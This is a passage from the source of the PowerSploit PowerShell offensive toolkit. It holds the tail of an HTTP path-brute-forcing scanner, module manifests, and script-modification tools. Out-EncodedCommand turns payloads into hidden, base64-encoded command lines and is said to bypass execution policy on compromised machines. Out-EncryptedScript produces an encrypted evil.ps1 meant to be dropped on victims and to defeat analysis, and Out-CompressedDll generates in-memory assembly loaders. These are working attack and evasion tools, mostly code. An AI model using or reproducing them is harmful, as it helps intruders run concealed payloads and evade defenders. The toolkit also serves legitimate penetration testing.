 70 |         if ($UseSSL -and $Port -eq 0) {
 71 |             # Default to 443 if SSL is specified but no port is specified
 72 |             $Port = 443
 73 |         } elseif ($Port -eq 0) {
 74 |             # Default to port 80 if no port is specified
 75 |             $Port = 80
 76 |         }
 77 |     
 78 |         $TcpConnection = New-Object System.Net.Sockets.TcpClient
 79 |         Write-Verbose "Path Test Succeeded - Testing Connectivity"
 80 |         
 81 |         try {
 82 |             # Validate that the host is listening before scanning
 83 |             $TcpConnection.Connect($Target, $Port)
 84 |         } catch {
 85 |             Write-Error "Connection Test Failed - Check Target"
 86 |             $Tcpconnection.Close()
 87 |             Return 
 88 |         }
 89 |         
 90 |         $Tcpconnection.Close()
 91 |     } else {
 92 |            Write-Error "Path Test Failed - Check Dictionary Path"
 93 |            Return
 94 |     }
 95 |     
 96 |     if ($UseSSL) {
 97 |         $SSL = 's'
 98 |         # Ignore invalid SSL certificates
 99 |         [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True }
100 |     } else {
101 |         $SSL = ''
102 |     }
103 |     
104 |     if (($Port -eq 80) -or ($Port -eq 443)) {
105 |         $PortNum = ''
106 |     } else {
107 |         $PortNum = ":$Port"
108 |     }
109 |     
110 |     # Check Http status for each entry in the doctionary file
111 |     foreach ($Item in Get-Content $Path) {
112 | 
113 |         $WebTarget = "http$($SSL)://$($Target)$($PortNum)/$($Item)"
114 |         $URI = New-Object Uri($WebTarget)
115 | 
116 |         try {
117 |             $WebRequest = [System.Net.WebRequest]::Create($URI)
118 |             $WebResponse = $WebRequest.GetResponse()
119 |             $WebStatus = $WebResponse.StatusCode
120 |             $ResultObject += $ScanObject
121 |             $WebResponse.Close()
122 |         } catch {
123 |             $WebStatus = $Error[0].Exception.InnerException.Response.StatusCode
124 |             
125 |             if ($WebStatus -eq $null) {
126 |                 # Not every exception returns a StatusCode.
127 |                 # If that is the case, return the Status.
128 |                 $WebStatus = $Error[0].Exception.InnerException.Status
129 |             }
130 |         } 
131 |         
132 |         $Result = @{ Status = $WebStatus;
133 |                      URL = $WebTarget}
134 |         
135 |         $ScanObject = New-Object -TypeName PSObject -Property $Result
136 |         
137 |         Write-Output $ScanObject
138 |         
139 |     }
140 | }
141 | 


--------------------------------------------------------------------------------
/Recon/Recon.psd1:
--------------------------------------------------------------------------------
 1 | @{
 2 | 
 3 | # Script module or binary module file associated with this manifest.
 4 | ModuleToProcess = 'Recon.psm1'
 5 | 
 6 | # Version number of this module.
 7 | ModuleVersion = '1.0.0.0'
 8 | 
 9 | # ID used to uniquely identify this module
10 | GUID = '7e775ad6-cd3d-4a93-b788-da067274c877'
11 | 
12 | # Author of this module
13 | Author = 'Matthew Graeber'
14 | 
15 | # Company or vendor of this module
16 | CompanyName = ''
17 | 
18 | # Copyright statement for this module
19 | Copyright = 'BSD 3-Clause'
20 | 
21 | # Description of the functionality provided by this module
22 | Description = 'PowerSploit Reconnaissance Module'
23 | 
24 | # Minimum version of the Windows PowerShell engine required by this module
25 | PowerShellVersion = '2.0'
26 | 
27 | # Name of the Windows PowerShell host required by this module
28 | # PowerShellHostName = ''
29 | 
30 | # Minimum version of the Windows PowerShell host required by this module
31 | # PowerShellHostVersion = ''
32 | 
33 | # Minimum version of the .NET Framework required by this module
34 | # DotNetFrameworkVersion = ''
35 | 
36 | # Minimum version of the common language runtime (CLR) required by this module
37 | # CLRVersion = ''
38 | 
39 | # Processor architecture (None, X86, Amd64) required by this module
40 | # ProcessorArchitecture = ''
41 | 
42 | # Modules that must be imported into the global environment prior to importing this module
43 | # RequiredModules = @()
44 | 
45 | # Assemblies that must be loaded prior to importing this module
46 | # RequiredAssemblies = @()
47 | 
48 | # Script files (.ps1) that are run in the caller's environment prior to importing this module.
49 | # ScriptsToProcess = ''
50 | 
51 | # Type files (.ps1xml) to be loaded when importing this module
52 | # TypesToProcess = @()
53 | 
54 | # Format files (.ps1xml) to be loaded when importing this module
55 | # FormatsToProcess = @()
56 | 
57 | # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
58 | # NestedModules = @()
59 | 
60 | # Functions to export from this module
61 | FunctionsToExport = '*'
62 | 
63 | # Cmdlets to export from this module
64 | CmdletsToExport = '*'
65 | 
66 | # Variables to export from this module
67 | VariablesToExport = ''
68 | 
69 | # Aliases to export from this module
70 | AliasesToExport = ''
71 | 
72 | # List of all modules packaged with this module.
73 | ModuleList = @(@{ModuleName = 'Recon'; ModuleVersion = '1.0.0.0'; GUID = '7e775ad6-cd3d-4a93-b788-da067274c877'})
74 | 
75 | # List of all files packaged with this module
76 | FileList = 'Recon.psm1', 'Recon.psd1', 'Get-HttpStatus.ps1', 'Invoke-ReverseDnsLookup.ps1',
77 |                'Invoke-Portscan.ps1', 'Get-ComputerDetails.ps1', 'Usage.md'
78 | 
79 | # Private data to pass to the module specified in RootModule/ModuleToProcess
80 | # PrivateData = ''
81 | 
82 | # HelpInfo URI of this module
83 | # HelpInfoURI = ''
84 | 
85 | # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
86 | # DefaultCommandPrefix = ''
87 | 
88 | }
89 | 


--------------------------------------------------------------------------------
/Recon/Recon.psm1:
--------------------------------------------------------------------------------
1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
2 | 


--------------------------------------------------------------------------------
/Recon/Usage.md:
--------------------------------------------------------------------------------
 1 | To install this module, drop the entire Recon folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
 2 | 
 3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
 4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
 5 | 
 6 | To use the module, type `Import-Module Recon`
 7 | 
 8 | To see the commands imported, type `Get-Command -Module Recon`
 9 | 
10 | For help on each individual command, Get-Help is your friend.
11 | 
12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.


--------------------------------------------------------------------------------
/ScriptModification/Out-CompressedDll.ps1:
--------------------------------------------------------------------------------
 1 | function Out-CompressedDll
 2 | {
 3 | <#
 4 | .SYNOPSIS
 5 | 
 6 | Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory.
 7 | 
 8 | PowerSploit Function: Out-CompressedDll
 9 | Author: Matthew Graeber (@mattifestation)
10 | License: BSD 3-Clause
11 | Required Dependencies: None
12 | Optional Dependencies: None
13 |  
14 | .DESCRIPTION
15 | 
16 | Out-CompressedDll outputs code that loads a compressed representation of a managed dll in memory as a byte array.
17 | 
18 | .PARAMETER FilePath
19 | 
20 | Specifies the path to a managed executable.
21 | 
22 | .EXAMPLE
23 | 
24 | C:\PS> Out-CompressedDll -FilePath evil.dll
25 | 
26 | Description
27 | -----------
28 | Compresses, base64 encodes, and outputs the code required to load evil.dll in memory.
29 | 
30 | .NOTES
31 | 
32 | Only pure MSIL-based dlls can be loaded using this technique. Native or IJW ('it just works' - mixed-mode) dlls will not load.
33 | 
34 | .LINK
35 | 
36 | http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html
37 | #>
38 | 
39 |     [CmdletBinding()] Param (
40 |         [Parameter(Mandatory = $True)]
41 |         [String]
42 |         $FilePath
43 |     )
44 | 
45 |     $Path = Resolve-Path $FilePath
46 | 
47 |     if (! [IO.File]::Exists($Path))
48 |     {
49 |         Throw "$Path does not exist."
50 |     }
51 | 
52 |     $FileBytes = [System.IO.File]::ReadAllBytes($Path)
53 | 
54 |     if (($FileBytes[0..1] | % {[Char]$_}) -join '' -cne 'MZ')
55 |     {
56 |         Throw "$Path is not a valid executable."
57 |     }
58 | 
59 |     $Length = $FileBytes.Length
60 |     $CompressedStream = New-Object IO.MemoryStream
61 |     $DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress)
62 |     $DeflateStream.Write($FileBytes, 0, $FileBytes.Length)
63 |     $DeflateStream.Dispose()
64 |     $CompressedFileBytes = $CompressedStream.ToArray()
65 |     $CompressedStream.Dispose()
66 |     $EncodedCompressedFile = [Convert]::ToBase64String($CompressedFileBytes)
67 | 
68 |     Write-Verbose "Compression ratio: $(($EncodedCompressedFile.Length/$FileBytes.Length).ToString('#%'))"
69 | 
70 |     $Output = @"
71 | `$EncodedCompressedFile = @'
72 | $EncodedCompressedFile
73 | '@
74 | `$DeflatedStream = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(`$EncodedCompressedFile),[IO.Compression.CompressionMode]::Decompress)
75 | `$UncompressedFileBytes = New-Object Byte[]($Length)
76 | `$DeflatedStream.Read(`$UncompressedFileBytes, 0, $Length) | Out-Null
77 | [Reflection.Assembly]::Load(`$UncompressedFileBytes)
78 | "@
79 | 
80 |     Write-Output $Output
81 | }
82 | 


--------------------------------------------------------------------------------
/ScriptModification/Out-EncodedCommand.ps1:
--------------------------------------------------------------------------------
  1 | function Out-EncodedCommand
  2 | {
  3 | <#
  4 | .SYNOPSIS
  5 | 
  6 | Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script.
  7 | 
  8 | PowerSploit Function: Out-EncodedCommand
  9 | Author: Matthew Graeber (@mattifestation)
 10 | License: BSD 3-Clause
 11 | Required Dependencies: None
 12 | Optional Dependencies: None
 13 |  
 14 | .DESCRIPTION
 15 | 
 16 | Out-EncodedCommand prepares a PowerShell script such that it can be pasted into a command prompt. The scenario for using this tool is the following: You compromise a machine, have a shell and want to execute a PowerShell script as a payload. This technique eliminates the need for an interactive PowerShell 'shell' and it bypasses any PowerShell execution policies.
 17 | 
 18 | .PARAMETER ScriptBlock
 19 | 
 20 | Specifies a scriptblock containing your payload.
 21 | 
 22 | .PARAMETER Path
 23 | 
 24 | Specifies the path to your payload.
 25 | 
 26 | .PARAMETER NoExit
 27 | 
 28 | Outputs the option to not exit after running startup commands.
 29 | 
 30 | .PARAMETER NoProfile
 31 | 
 32 | Outputs the option to not load the Windows PowerShell profile.
 33 | 
 34 | .PARAMETER NonInteractive
 35 | 
 36 | Outputs the option to not present an interactive prompt to the user.
 37 | 
 38 | .PARAMETER Wow64
 39 | 
 40 | Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations.
 41 | 
 42 | .PARAMETER WindowStyle
 43 | 
 44 | Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden.
 45 | 
 46 | .PARAMETER EncodedOutput
 47 | 
 48 | Base-64 encodes the entirety of the output. This is usually unnecessary and effectively doubles the size of the output. This option is only for those who are extra paranoid.
 49 | 
 50 | .EXAMPLE
 51 | 
 52 | C:\PS> Out-EncodedCommand -ScriptBlock {Write-Host 'hello, world!'}
 53 | 
 54 | powershell -C sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('Cy/KLEnV9cgvLlFQz0jNycnXUSjPL8pJUVQHAA=='),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()
 55 | 
 56 | .EXAMPLE
 57 | 
 58 | C:\PS> Out-EncodedCommand -Path C:\EvilPayload.ps1 -NonInteractive -NoProfile -WindowStyle Hidden -EncodedOutput
 59 | 
 60 | powershell -NoP -NonI -W Hidden -E cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcATABjAGkAeABDAHMASQB3AEUAQQBEAFEAWAAzAEUASQBWAEkAYwBtAEwAaQA1AEsAawBGAEsARQA2AGwAQgBCAFIAWABDADgAaABLAE8ATgBwAEwAawBRAEwANAAzACsAdgBRAGgAdQBqAHkAZABBADkAMQBqAHEAcwAzAG0AaQA1AFUAWABkADAAdgBUAG4ATQBUAEMAbQBnAEgAeAA0AFIAMAA4AEoAawAyAHgAaQA5AE0ANABDAE8AdwBvADcAQQBmAEwAdQBYAHMANQA0ADEATwBLAFcATQB2ADYAaQBoADkAawBOAHcATABpAHMAUgB1AGEANABWAGEAcQBVAEkAagArAFUATwBSAHUAVQBsAGkAWgBWAGcATwAyADQAbgB6AFYAMQB3ACsAWgA2AGUAbAB5ADYAWgBsADIAdAB2AGcAPQA9ACcAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkALABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA=
 61 | 
 62 | Description
 63 | -----------
 64 | Execute the above payload for the lulz. >D
 65 | 
 66 | .NOTES
 67 | 
 68 | This cmdlet was inspired by the createcmd.ps1 script introduced during Dave Kennedy and Josh Kelley's talk, "PowerShell...OMFG" (https://www.trustedsec.com/files/PowerShell_PoC.zip)
 69 | 
 70 | .LINK
 71 | 
 72 | http://www.exploit-monday.com
 73 | #>
 74 | 
 75 |     [CmdletBinding( DefaultParameterSetName = 'FilePath')] Param (
 76 |         [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock' )]
 77 |         [ValidateNotNullOrEmpty()]
 78 |         [ScriptBlock]
 79 |         $ScriptBlock,
 80 | 
 81 |         [Parameter(Position = 0, ParameterSetName = 'FilePath' )]
 82 |         [ValidateNotNullOrEmpty()]
 83 |         [String]
 84 |         $Path,
 85 | 
 86 |         [Switch]
 87 |         $NoExit,
 88 | 
 89 |         [Switch]
 90 |         $NoProfile,
 91 | 
 92 |         [Switch]
 93 |         $NonInteractive,
 94 | 
 95 |         [Switch]
 96 |         $Wow64,
 97 | 
 98 |         [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')]
 99 |         [String]
100 |         $WindowStyle,
101 | 
102 |         [Switch]
103 |         $EncodedOutput
104 |     )
105 | 
106 |     if ($PSBoundParameters['Path'])
107 |     {
108 |         Get-ChildItem $Path -ErrorAction Stop | Out-Null
109 |         $ScriptBytes = [IO.File]::ReadAllBytes((Resolve-Path $Path))
110 |     }
111 |     else
112 |     {
113 |         $ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($ScriptBlock)
114 |     }
115 | 
116 |     $CompressedStream = New-Object IO.MemoryStream
117 |     $DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress)
118 |     $DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length)
119 |     $DeflateStream.Dispose()
120 |     $CompressedScriptBytes = $CompressedStream.ToArray()
121 |     $CompressedStream.Dispose()
122 |     $EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes)
123 | 
124 |     # Generate the code that will decompress and execute the payload.
125 |     # This code is intentionally ugly to save space.
126 |     $NewScript = 'sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(' + "'$EncodedCompressedScript'" + '),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()'
127 | 
128 |     # Base-64 strings passed to -EncodedCommand must be unicode encoded.
129 |     $UnicodeEncoder = New-Object System.Text.UnicodeEncoding
130 |     $EncodedPayloadScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($NewScript))
131 | 
132 |     # Build the command line options
133 |     # Use the shortest possible command-line arguments to save space. Thanks @obscuresec for the idea.
134 |     $CommandlineOptions = New-Object String[](0)
135 |     if ($PSBoundParameters['NoExit'])
136 |     { $CommandlineOptions += '-NoE' }
137 |     if ($PSBoundParameters['NoProfile'])
138 |     { $CommandlineOptions += '-NoP' }
139 |     if ($PSBoundParameters['NonInteractive'])
140 |     { $CommandlineOptions += '-NonI' }
141 |     if ($PSBoundParameters['WindowStyle'])
142 |     { $CommandlineOptions += "-W $($PSBoundParameters['WindowStyle'])" }
143 | 
144 |     $CmdMaxLength = 8190
145 | 
146 |     # Build up the full command-line string. Default to outputting a fully base-64 encoded command.
147 |     # If the fully base-64 encoded output exceeds the cmd.exe character limit, fall back to partial
148 |     # base-64 encoding to save space. Thanks @Carlos_Perez for the idea.
149 |     if ($PSBoundParameters['Wow64'])
150 |     {
151 |         $CommandLineOutput = "$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions -join ' ') -C `"$NewScript`""
152 | 
153 |         if ($PSBoundParameters['EncodedOutput'] -or $CommandLineOutput.Length -le $CmdMaxLength)
154 |         {
155 |             $CommandLineOutput = "$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions -join ' ') -E `"$EncodedPayloadScript`""
156 |         }
157 | 
158 |         if (($CommandLineOutput.Length -gt $CmdMaxLength) -and (-not $PSBoundParameters['EncodedOutput']))
159 |         {
160 |             $CommandLineOutput = "$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions -join ' ') -C `"$NewScript`""
161 |         }
162 |     }
163 |     else
164 |     {
165 |         $CommandLineOutput = "powershell $($CommandlineOptions -join ' ') -C `"$NewScript`""
166 | 
167 |         if ($PSBoundParameters['EncodedOutput'] -or $CommandLineOutput.Length -le $CmdMaxLength)
168 |         {
169 |             $CommandLineOutput = "powershell $($CommandlineOptions -join ' ') -E `"$EncodedPayloadScript`""
170 |         }
171 | 
172 |         if (($CommandLineOutput.Length -gt $CmdMaxLength) -and (-not $PSBoundParameters['EncodedOutput']))
173 |         {
174 |             $CommandLineOutput = "powershell $($CommandlineOptions -join ' ') -C `"$NewScript`""
175 |         }
176 |     }
177 | 
178 |     if ($CommandLineOutput.Length -gt $CmdMaxLength)
179 |     {
180 |             Write-Warning 'This command exceeds the cmd.exe maximum allowed length!'
181 |     }
182 | 
183 |     Write-Output $CommandLineOutput
184 | }
185 | 


--------------------------------------------------------------------------------
/ScriptModification/Out-EncryptedScript.ps1:
--------------------------------------------------------------------------------
  1 | function Out-EncryptedScript
  2 | {
  3 | <#
  4 | .SYNOPSIS
  5 | 
  6 | Encrypts text files/scripts.
  7 | 
  8 | PowerSploit Function: Out-EncryptedScript
  9 | Author: Matthew Graeber (@mattifestation)
 10 | License: BSD 3-Clause
 11 | Required Dependencies: None
 12 | Optional Dependencies: None
 13 | 
 14 | .DESCRIPTION
 15 | 
 16 | Out-EncryptedScript will encrypt a script (or any text file for that
 17 | matter) and output the results to a minimally obfuscated script -
 18 | evil.ps1 by default.
 19 | 
 20 | .PARAMETER ScriptPath
 21 | 
 22 | Path to this script
 23 | 
 24 | .PARAMETER Password
 25 | 
 26 | Password to encrypt/decrypt the script
 27 | 
 28 | .PARAMETER Salt
 29 | 
 30 | Salt value for encryption/decryption. This can be any string value.
 31 | 
 32 | .PARAMETER InitializationVector
 33 | 
 34 | Specifies a 16-character the initialization vector to be used. This
 35 | is randomly generated by default.
 36 | 
 37 | .EXAMPLE
 38 | 
 39 | C:\PS> Out-EncryptedScript .\Naughty-Script.ps1 password salty
 40 | 
 41 | Description
 42 | -----------
 43 | Encrypt the contents of this file with a password and salt. This will
 44 | make analysis of the script impossible without the correct password
 45 | and salt combination. This command will generate evil.ps1 that can
 46 | dropped onto the victim machine. It only consists of a decryption
 47 | function 'de' and the base64-encoded ciphertext.
 48 | 
 49 | .EXAMPLE
 50 | 
 51 | C:\PS> [String] $cmd = Get-Content .\evil.ps1
 52 | C:\PS> Invoke-Expression $cmd
 53 | C:\PS> $decrypted = de password salt
 54 | C:\PS> Invoke-Expression $decrypted
 55 | 
 56 | Description
 57 | -----------
 58 | This series of instructions assumes you've already encrypted a script
 59 | and named it evil.ps1. The contents are then decrypted and the
 60 | unencrypted script is called via Invoke-Expression
 61 | 
 62 | .NOTES
 63 | 
 64 | This command can be used to encrypt any text-based file/script
 65 | #>
 66 | 
 67 |     [CmdletBinding()] Param (
 68 |         [Parameter(Position = 0, Mandatory = $True)]
 69 |         [String]
 70 |         $ScriptPath,
 71 |     
 72 |         [Parameter(Position = 1, Mandatory = $True)]
 73 |         [String]
 74 |         $Password,
 75 |     
 76 |         [Parameter(Position = 2, Mandatory = $True)]
 77 |         [String]
 78 |         $Salt,
 79 |     
 80 |         [Parameter(Position = 3)]
 81 |         [ValidateLength(16, 16)]
 82 |         [String]
 83 |         $InitializationVector = ((1..16 | % {[Char](Get-Random -Min 0x41 -Max 0x5B)}) -join ''),
 84 |     
 85 |         [Parameter(Position = 4)]
 86 |         [String]
 87 |         $FilePath = '.\evil.ps1'
 88 |     )
 89 | 
 90 |     $AsciiEncoder = New-Object System.Text.ASCIIEncoding
 91 |     $ivBytes = $AsciiEncoder.GetBytes($InitializationVector)
 92 |     # While this can be used to encrypt any file, it's primarily designed to encrypt itself.
 93 |     [Byte[]] $scriptBytes = [Text.Encoding]::ASCII.GetBytes((Get-Content -Encoding Ascii -Path $ScriptPath))
 94 |     $DerivedPass = New-Object System.Security.Cryptography.PasswordDeriveBytes($Password, $AsciiEncoder.GetBytes($Salt), "SHA1", 2)
 95 |     $Key = New-Object System.Security.Cryptography.TripleDESCryptoServiceProvider
 96 |     $Key.Mode = [System.Security.Cryptography.CipherMode]::CBC
 97 |     [Byte[]] $KeyBytes = $DerivedPass.GetBytes(16)
 98 |     $Encryptor = $Key.CreateEncryptor($KeyBytes, $ivBytes)
 99 |     $MemStream = New-Object System.IO.MemoryStream
100 |     $CryptoStream = New-Object System.Security.Cryptography.CryptoStream($MemStream, $Encryptor, [System.Security.Cryptography.CryptoStreamMode]::Write)
101 |     $CryptoStream.Write($scriptBytes, 0, $scriptBytes.Length)
102 |     $CryptoStream.FlushFinalBlock()
103 |     $CipherTextBytes = $MemStream.ToArray()
104 |     $MemStream.Close()
105 |     $CryptoStream.Close()
106 |     $Key.Clear()
107 |     $Cipher = [Convert]::ToBase64String($CipherTextBytes)
108 | 
109 | # Generate encrypted PS1 file. All that will be included is the base64-encoded ciphertext and a slightly 'obfuscated' decrypt function
110 | $Output = @"
111 | function de([String] `$b, [String] `$c)
112 | {
113 | `$a = "$Cipher";
114 | `$encoding = New-Object System.Text.ASCIIEncoding;
115 | `$dd = `$encoding.GetBytes("$InitializationVector");
116 | `$aa = [Convert]::FromBase64String(`$a);
117 | `$derivedPass = New-Object System.Security.Cryptography.PasswordDeriveBytes(`$b, `$encoding.GetBytes(`$c), "SHA1", 2);
118 | [Byte[]] `$e = `$derivedPass.GetBytes(16);
119 | `$f = New-Object System.Security.Cryptography.TripleDESCryptoServiceProvider;
120 | `$f.Mode = [System.Security.Cryptography.CipherMode]::CBC;
121 | [Byte[]] `$h = New-Object Byte[](`$aa.Length);
122 | `$g = `$f.CreateDecryptor(`$e, `$dd);
123 | `$i = New-Object System.IO.MemoryStream(`$aa, `$True);
124 | `$j = New-Object System.Security.Cryptography.CryptoStream(`$i, `$g, [System.Security.Cryptography.CryptoStreamMode]::Read);
125 | `$r = `$j.Read(`$h, 0, `$h.Length);
126 | `$i.Close();
127 | `$j.Close();
128 | `$f.Clear();
129 | return `$encoding.GetString(`$h,0,`$h.Length);
130 | }
131 | "@
132 | 
133 |     # Output decrypt function and ciphertext to evil.ps1
134 |     Out-File -InputObject $Output -Encoding ASCII $FilePath
135 | 
136 |     Write-Verbose "Encrypted PS1 file saved to: $(Resolve-Path $FilePath)"
137 | }
138 | 


--------------------------------------------------------------------------------
/ScriptModification/Remove-Comments.ps1:
--------------------------------------------------------------------------------
  1 | function Remove-Comments
  2 | {
  3 | <#
  4 | .SYNOPSIS
  5 | 
  6 | Strips comments and extra whitespace from a script.
  7 | 
  8 | PowerSploit Function: Remove-Comments
  9 | Author: Matthew Graeber (@mattifestation)
 10 | License: BSD 3-Clause
 11 | Required Dependencies: None
 12 | Optional Dependencies: None
 13 |  
 14 | .DESCRIPTION
 15 | 
 16 | Remove-Comments strips out comments and unnecessary whitespace from a script. This is best used in conjunction with Out-EncodedCommand when the size of the script to be encoded might be too big.
 17 | 
 18 | A major portion of this code was taken from the Lee Holmes' Show-ColorizedContent script. You rock, Lee!
 19 | 
 20 | .PARAMETER ScriptBlock
 21 | 
 22 | Specifies a scriptblock containing your script.
 23 | 
 24 | .PARAMETER Path
 25 | 
 26 | Specifies the path to your script.
 27 | 
 28 | .EXAMPLE
 29 | 
 30 | C:\PS> $Stripped = Remove-Comments -Path .\ScriptWithComments.ps1
 31 | 
 32 | .EXAMPLE
 33 | 
 34 | C:\PS> Remove-Comments -ScriptBlock {
 35 | ### This is my awesome script. My documentation is beyond reproach!
 36 |       Write-Host 'Hello, World!' ### Write 'Hello, World' to the host
 37 | ### End script awesomeness
 38 | }
 39 | 
 40 | Write-Host 'Hello, World!'
 41 | 
 42 | .EXAMPLE
 43 | 
 44 | C:\PS> Remove-Comments -Path Inject-Shellcode.ps1 | Out-EncodedCommand
 45 | 
 46 | Description
 47 | -----------
 48 | Removes extraneous whitespace and comments from Inject-Shellcode (which is notoriously large) and pipes the output to Out-EncodedCommand.
 49 | 
 50 | .INPUTS
 51 | 
 52 | System.String, System.Management.Automation.ScriptBlock
 53 | 
 54 | Accepts either a string containing the path to a script or a scriptblock.
 55 | 
 56 | .OUTPUTS
 57 | 
 58 | System.Management.Automation.ScriptBlock
 59 | 
 60 | Remove-Comments returns a scriptblock. Call the ToString method to convert a scriptblock to a string, if desired.
 61 | 
 62 | .LINK
 63 | 
 64 | http://www.exploit-monday.com
 65 | http://www.leeholmes.com/blog/2007/11/07/syntax-highlighting-in-powershell/
 66 | #>
 67 | 
 68 |     [CmdletBinding( DefaultParameterSetName = 'FilePath' )] Param (
 69 |         [Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'FilePath' )]
 70 |         [ValidateNotNullOrEmpty()]
 71 |         [String]
 72 |         $Path,
 73 | 
 74 |         [Parameter(Position = 0, ValueFromPipeline = $True, Mandatory = $True, ParameterSetName = 'ScriptBlock' )]
 75 |         [ValidateNotNullOrEmpty()]
 76 |         [ScriptBlock]
 77 |         $ScriptBlock
 78 |     )
 79 | 
 80 |     Set-StrictMode -Version 2
 81 | 
 82 |     if ($PSBoundParameters['Path'])
 83 |     {
 84 |         Get-ChildItem $Path -ErrorAction Stop | Out-Null
 85 |         $ScriptBlockString = [IO.File]::ReadAllText((Resolve-Path $Path))
 86 |         $ScriptBlock = [ScriptBlock]::Create($ScriptBlockString)
 87 |     }
 88 |     else
 89 |     {
 90 |         # Convert the scriptblock to a string so that it can be referenced with array notation
 91 |         $ScriptBlockString = $ScriptBlock.ToString()
 92 |     }
 93 | 
 94 |     # Tokenize the scriptblock and return all tokens except for comments
 95 |     $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptBlock, [Ref] $Null) | Where-Object { $_.Type -ne 'Comment' }
 96 | 
 97 |     $StringBuilder = New-Object Text.StringBuilder
 98 | 
 99 |     # The majority of the remaining code comes from Lee Holmes' Show-ColorizedContent script.
100 |     $CurrentColumn = 1
101 |     $NewlineCount = 0
102 |     foreach($CurrentToken in $Tokens)
103 |     {
104 |         # Now output the token
105 |         if(($CurrentToken.Type -eq 'NewLine') -or ($CurrentToken.Type -eq 'LineContinuation'))
106 |         {
107 |             $CurrentColumn = 1
108 |             # Only insert a single newline. Sequential newlines are ignored in order to save space.
109 |             if ($NewlineCount -eq 0)
110 |             {
111 |                 $StringBuilder.AppendLine() | Out-Null
112 |             }
113 |             $NewlineCount++
114 |         }
115 |         else
116 |         {
117 |             $NewlineCount = 0
118 | 
119 |             # Do any indenting
120 |             if($CurrentColumn -lt $CurrentToken.StartColumn)
121 |             {
122 |                 # Insert a single space in between tokens on the same line. Extraneous whiltespace is ignored.
123 |                 if ($CurrentColumn -ne 1)
124 |                 {
125 |                     $StringBuilder.Append(' ') | Out-Null
126 |                 }
127 |             }
128 | 
129 |             # See where the token ends
130 |             $CurrentTokenEnd = $CurrentToken.Start + $CurrentToken.Length - 1
131 | 
132 |             # Handle the line numbering for multi-line strings
133 |             if(($CurrentToken.Type -eq 'String') -and ($CurrentToken.EndLine -gt $CurrentToken.StartLine))
134 |             {
135 |                 $LineCounter = $CurrentToken.StartLine
136 |                 $StringLines = $(-join $ScriptBlockString[$CurrentToken.Start..$CurrentTokenEnd] -split '`r`n')
137 | 
138 |                 foreach($StringLine in $StringLines)
139 |                 {
140 |                     $StringBuilder.Append($StringLine) | Out-Null
141 |                     $LineCounter++
142 |                 }
143 |             }
144 |             # Write out a regular token
145 |             else
146 |             {
147 |                 $StringBuilder.Append((-join $ScriptBlockString[$CurrentToken.Start..$CurrentTokenEnd])) | Out-Null
148 |             }
149 | 
150 |             # Update our position in the column
151 |             $CurrentColumn = $CurrentToken.EndColumn
152 |         }
153 |     }
154 | 
155 |     Write-Output ([ScriptBlock]::Create($StringBuilder.ToString()))
156 | }
157 | 


--------------------------------------------------------------------------------
/ScriptModification/ScriptModification.psd1:
--------------------------------------------------------------------------------
 1 | @{
 2 | 
 3 | # Script module or binary module file associated with this manifest.
 4 | ModuleToProcess = 'ScriptModification.psm1'
 5 | 
 6 | # Version number of this module.
 7 | ModuleVersion = '1.0.0.0'
 8 | 
 9 | # ID used to uniquely identify this module
10 | GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610'
11 | 
12 | # Author of this module
13 | Author = 'Matthew Graeber'
14 | 
15 | # Company or vendor of this module
16 | CompanyName = ''
17 | 
18 | # Copyright statement for this module
